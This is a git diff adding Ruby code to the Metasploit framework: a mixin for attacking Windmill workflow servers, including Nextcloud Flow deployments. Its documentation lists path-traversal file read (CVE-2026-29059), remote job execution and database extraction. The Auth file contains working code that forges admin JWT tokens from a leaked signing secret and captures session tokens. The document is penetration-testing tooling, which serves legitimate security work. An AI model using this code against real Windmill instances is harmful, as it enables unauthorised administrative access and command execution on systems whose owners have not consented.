rapid7
diff --git a/‎lib/msf/core/exploit/remote/http/windmill.rb‎
Lines changed: 109 additions & 0 deletions b/‎lib/msf/core/exploit/remote/http/windmill.rb‎
Lines changed: 109 additions & 0 deletions
diff --git a/‎lib/msf/core/exploit/remote/http/windmill/auth.rb‎
Lines changed: 173 additions & 0 deletions b/‎lib/msf/core/exploit/remote/http/windmill/auth.rb‎
Lines changed: 173 additions & 0 deletions
@@ -0,0 +1,109 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        #
+        # Windmill API interaction mixin for Metasploit modules
+        #
+        # Provides primitives for interacting with Windmill workflow automation
+        # platform, including support for Nextcloud Flow deployments via AppAPI.
+        #
+        # == Supported Deployment Types
+        #
+        # - *Standalone*: Direct Windmill installation
+        # - *Nextcloud Flow (proxy)*: Windmill behind Nextcloud AppAPI proxy
+        # - *Nextcloud Flow (direct)*: Windmill accessible alongside Nextcloud
+        #
+        # == Included Modules
+        #
+        # The following modules are automatically included:
+        # - {Constants}: API endpoints and configuration values
+        # - {HttpHelpers}: Low-level HTTP request helpers
+        # - {Detection}: Deployment type auto-detection
+        # - {Auth}: Authentication and JWT forging
+        # - {Workspace}: Workspace management
+        # - {FileRead}: Path traversal file read (CVE-2026-29059)
+        # - {Jobs}: Job execution API
+        # - {Postgres}: PostgreSQL data extraction
+        # == Instance Variables
+        #
+        # The mixin maintains the following state:
+        # - @windmill_api_prefix: Detected API path prefix
+        # - @windmill_deployment_type: Deployment type constant
+        # - @windmill_token: Authentication token
+        # - @windmill_workspace: Current workspace ID
+        # - @windmill_version: Detected Windmill version
+        #
+        # == Example Usage
+        #
+        #   class MetasploitModule < Msf::Exploit::Remote
+        #     include Msf::Exploit::Remote::HTTP::Windmill
+        #
+        #     def exploit
+        #       return unless windmill_detect_deployment
+        #       windmill_login(datastore['USERNAME'], datastore['PASSWORD'])
+        #       windmill_run_job('id', language: 'bash')
+        #     end
+        #   end
+        #
+        # @author Valentin Lobstein (Chocapikk)
+        #
+        # @see https://github.com/Chocapikk/Windfall
+        # @see https://www.windmill.dev/
+        #
+        module Windmill
+          include Msf::Exploit::Remote::HttpClient
+          include Msf::Exploit::Remote::HTTP::Windmill::Constants
+          include Msf::Exploit::Remote::HTTP::Windmill::HttpHelpers
+          include Msf::Exploit::Remote::HTTP::Windmill::Detection
+          include Msf::Exploit::Remote::HTTP::Windmill::Auth
+          include Msf::Exploit::Remote::HTTP::Windmill::Workspace
+          include Msf::Exploit::Remote::HTTP::Windmill::FileRead
+          include Msf::Exploit::Remote::HTTP::Windmill::Jobs
+          include Msf::Exploit::Remote::HTTP::Windmill::Postgres
+
+          # @!attribute [rw] windmill_api_prefix
+          #   @return [String, nil] Detected API path prefix (e.g., '/api')
+          #
+          # @!attribute [rw] windmill_deployment_type
+          #   @return [String, nil] Deployment type (see Constants::DEPLOYMENT_*)
+          #
+          # @!attribute [rw] windmill_token
+          #   @return [String, nil] Authentication token (Bearer or JWT)
+          #
+          # @!attribute [rw] windmill_workspace
+          #   @return [String, nil] Current workspace ID
+          #
+          # @!attribute [rw] windmill_version
+          #   @return [String, nil] Detected Windmill version string
+          attr_accessor :windmill_api_prefix, :windmill_deployment_type, :windmill_token,
+                        :windmill_workspace, :windmill_version
+
+          #
+          # Initialize the Windmill mixin
+          #
+          # Registers module options and initializes instance variables.
+          #
+          # @param info [Hash] Module information hash
+          #
+          def initialize(info = {})
+            super
+
+            register_options([
+              Msf::OptString.new('TARGETURI', [true, 'Base path to Windmill', '/'])
+            ], Msf::Exploit::Remote::HTTP::Windmill)
+
+            @windmill_api_prefix = nil
+            @windmill_deployment_type = nil
+            @windmill_token = nil
+            @windmill_workspace = nil
+            @windmill_version = nil
+          end
+        end
+      end
+    end
+  end
+end
@@ -0,0 +1,173 @@
+# -*- coding: binary -*-
+# frozen_string_literal: true
+
+module Msf
+  class Exploit
+    class Remote
+      module HTTP
+        module Windmill
+          #
+          # Authentication and JWT methods for Windmill API
+          #
+          # Provides authentication primitives including:
+          # - Username/password login
+          # - JWT token forging (requires leaked jwt_secret)
+          # - Authentication verification
+          #
+          # @author Valentin Lobstein (Chocapikk)
+          #
+          module Auth
+            include Msf::Exploit::Remote::HTTP::Windmill::Constants
+
+            #
+            # Forge a Windmill JWT token with admin privileges
+            #
+            # Creates a valid JWT token using HMAC-SHA256 signing. The forged token
+            # grants super_admin privileges for the specified workspace.
+            #
+            # @param jwt_secret [String] The JWT signing secret (typically 32 alphanumeric chars)
+            # @param email [String] Email address for the forged identity
+            # @param workspace [String] Workspace ID to include in token claims
+            # @return [String] Forged JWT token prefixed with 'jwt_' (Windmill convention)
+            #
+            # @example Forge admin token
+            #   token = windmill_forge_jwt('abc123...', 'admin@example.com', 'main')
+            #   # => 'jwt_eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9...'
+            #
+            def windmill_forge_jwt(jwt_secret, email, workspace)
+              header = { alg: 'HS256', typ: 'JWT' }
+              payload = {
+                email: email,
+                username: email.split('@').first,
+                is_admin: true,
+                is_operator: false,
+                groups: %w[all],
+                folders: [],
+                label: nil,
+                workspace_id: workspace,
+                exp: Time.now.to_i + (86_400 * 30) # 30 days
+              }
+
+              unsigned = [header, payload].map { |h| windmill_base64url_encode(h.to_json) }.join('.')
+              signature = OpenSSL::HMAC.digest('SHA256', jwt_secret, unsigned)
+
+              "jwt_#{unsigned}.#{windmill_base64url_encode(signature)}"
+            end
+
+            #
+            # Verify current authentication and retrieve user info
+            #
+            # Calls the /users/whoami endpoint to validate the current token
+            # and retrieve user details.
+            #
+            # @return [Hash, nil] User info hash or nil on failure
+            # @option return [String] :email User's email address
+            # @option return [Boolean] :super_admin Whether user is super admin
+            # @option return [Boolean] :is_admin Whether user is workspace admin
+            #
+            # @example Check authentication
+            #   if (info = windmill_verify_auth)
+            #     print_good("Logged in as #{info[:email]}")
+            #   end
+            #
+            def windmill_verify_auth
+              res = windmill_get(windmill_api_path(API_WHOAMI))
+              return unless res&.code == 200
+
+              JSON.parse(res.body).then do |data|
+                { email: data['email'], super_admin: data['super_admin'], is_admin: data['is_admin'] }
+              end
+            rescue JSON::ParserError
+              nil
+            end
+
+            #
+            # Authenticate to Windmill with username and password
+            #
+            # Performs email/password authentication and stores the resulting
+            # token in @windmill_token for subsequent requests.
+            #
+            # @param username [String] Email address or username
+            # @param password [String] Password
+            # @return [String, nil] Authentication token on success, nil on failure
+            #
+            # @example Login with credentials
+            #   if windmill_login('user@example.com', 'password123')
+            #     print_good('Authentication successful')
+            #   end
+            #
+            def windmill_login(username, password)
+              windmill_detect_deployment unless windmill_api_prefix
+
+              res = perform_login_request(username, password)
+              return handle_rate_limit if res&.code == 429
+              return unless res&.code == 200
+
+              extract_token(res)
+            end
+
+            private
+
+            #
+            # Perform the actual login HTTP request
+            #
+            # @param username [String] Email/username
+            # @param password [String] Password
+            # @return [Rex::Proto::Http::Response, nil] HTTP response
+            #
+            def perform_login_request(username, password)
+              opts = {
+                'ctype' => 'application/json',
+                'data' => { email: username, password: password }.to_json,
+                auth: false
+              }
+
+              if windmill_is_proxy? && datastore['NC_USER'] && datastore['NC_PASS']
+                opts['authorization'] = windmill_basic_auth(datastore['NC_USER'], datastore['NC_PASS'])
+              end
+
+              windmill_post(windmill_api_path(API_AUTH_LOGIN), **opts)
+            end
+
+            #
+            # Handle rate limit response from Nextcloud
+            #
+            # @return [nil] Always returns nil
+            #
+            def handle_rate_limit
+              print_error('Rate limited by Nextcloud. Please try again later.')
+              nil
+            end
+
+            #
+            # Extract and store token from login response
+            #
+            # @param res [Rex::Proto::Http::Response] Login response
+            # @return [String, nil] Token string or nil
+            #
+            def extract_token(res)
+              token = res.body.strip.delete('"')
+              return if token.empty?
+
+              @windmill_token = token
+              extract_proxy_cookie(res) if windmill_is_proxy?
+              token
+            end
+
+            #
+            # Extract token cookie from proxy response
+            #
+            # @param res [Rex::Proto::Http::Response] Response with cookies
+            # @return [void]
+            #
+            def extract_proxy_cookie(res)
+              return unless res.get_cookies =~ /token=([^;]+)/
+
+              @windmill_token_cookie = ::Regexp.last_match(1)
+            end
+          end
+        end
+      end
+    end
+  end
+end